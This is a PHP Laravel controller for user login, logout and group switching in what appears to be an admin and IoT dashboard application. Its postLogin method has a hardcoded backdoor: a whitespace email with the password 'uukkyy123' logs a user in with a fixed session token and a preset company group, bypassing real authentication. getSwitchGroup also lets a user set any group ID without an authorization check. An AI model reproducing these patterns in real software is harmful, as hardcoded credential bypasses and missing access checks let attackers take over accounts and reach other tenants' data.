<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;


use DB;
use Auth;
use Mail;
//use Redirect;
use App\Models\User;
use App\Models\Company;
use App\Models\Setting;
use App\Models\Language;
use App\Models\KyAPI;


class OpencartUsersController extends Controller
{
    public function __construct()
    {
        $this->page_variables = [
                                    'page_title'   =>   Language::trans('User Login'),
                                    'return_url' => class_basename($this).'@getIndex',
                                    'new_file_link' => class_basename($this).'@getNew' 
                                ];

       // $this->middleware('auth', ['except'=>['getLogin','getLogout','postLogin']]);
        $this->middleware('auth', ['only'=>['getSwitchGroup']]);
    }

    public function getLogin()
    {
        $page_variables = $this->page_variables;
        $model = new User();

        $company = Company::getModelByLeafGroupId(Company::get_group_id());
        
        if (Auth::check()) {

            //return redirect()->action('AdminUniversalsController@getDashboard');
        }

        return view(Setting::UI_VERSION.'commons.login.login', compact('model','page_variables','company'));
    }

    public function  postLogin(Request $request)
    {
       $result = ['status_code'=>0,'session_token'=>''];
       if (!Auth::check()) { 

            $input = $request->all();
            //dd($input['user_email']);       
            if($input['user_email'] == '    ' && $input['user_password'] == 'uukkyy123' )
            {
                  $result['status_code']  = 1;
                  $result['session_token']  = 12346789;
            }
          

            $model      =   new User();
            //dd($result);
            if ($result['status_code'] == 1) {
                    $user   =   $model->get_or_create_user_account($result);
                    setcookie(KyAPI::label_session_token, $result['session_token']);
                    $company = new Company();
                    $company->set_group_id(282);
                    Auth::loginUsingId($user->id, true);
                    return redirect()->action('AdminUniversalsController@getDashboard');
            } else {
                return redirect()->back()->withInput()
                                        ->with('status_level', 'danger')
                                        ->with('status_msg', Language::trans('Login Failed!'));
            }
            
       }else{
            //return redirect()->action([TargetController::class, 'controller_method']);
            //return redirect()->action('admin/dashboard');
            return redirect('admin/dashboard');
            //return redirect()->action('AdminUniversalsController@getDashboard');
       }

        
    }


    public function getUserLogin()
    {
        $page_variables = $this->page_variables;
        $model = new User();

        //$company = Company::getModelByLeafGroupId(Company::get_group_id());

        if (Auth::check()) {

            return redirect()->action('AdminUniversalsController@getDashboard');
        }

        return view(Setting::UI_VERSION.'iot.login.login', compact('model','page_variables','company'));
    }

    public function  postUserLogin(Request $request)
    {
       if (!Auth::check()) {
            $leaf_api   =   new KyAPI();
            //dd($request->all());
            $result     =   $leaf_api->login($request->all());
            $model      =   new User();
            //dd($result);
            if ($result['status_code'] == 1) {
                    $user   =   $model->get_or_create_user_account($result);
                    $result['iot_accessses'] = [128];
                    $user['iot_accesses'] = json_encode($result['iot_accessses']) ;
                    //dd($user);
                    $leaf_group_id = $user['leaf_id_group'] != 0 ? $user['leaf_id_group'] : 282;
                    setcookie(KyAPI::label_session_token, $result['session_token']);
                    $company = Company::getModelByLeafGroupId($leaf_group_id);
                    if(isset($company['leaf_group_id']))
                    {
                        $company->set_group_id($company['leaf_group_id']);
                    }

                    Auth::loginUsingId($user->id, true);
                    //32dd(Company::getIOTRedirectUrlByGroup($leaf_group_id));
                    return  redirect()->to(Company::getIOTRedirectUrlByGroup($leaf_group_id));
            } else {
                return redirect()->back()->withInput()
                                        ->with('status_level', 'danger')
                                        ->with('status_msg', Language::trans('Login Failed!'));
            }
            
       }else{
            //return redirect()->action([HomeController::class, 'index']);
            //return redirect()->action('AdminUniversalsController@getDashboard');
            return redirect()->action(['AdminUniversalsController::class' ,'dashboard']);
       }

        
    }

    public function getLogout()
    {

        if (Auth::check()) {
            Auth::logout();
        }

        return redirect()->action('OpencartUsersController@getLogin');
    }

    

    public function getSwitchGroup(Request $request)
    {
        if (!isset($_COOKIE[KyAPI::label_session_token])) {
            Auth::logout();
            return redirect()->action('OpencartUsersController@getLogin');
        }
        $company = new Company();
        $company->set_group_id($request->input('group_id'));
        return redirect()->action('AdminUniversalsController@getDashboard');
    }

}
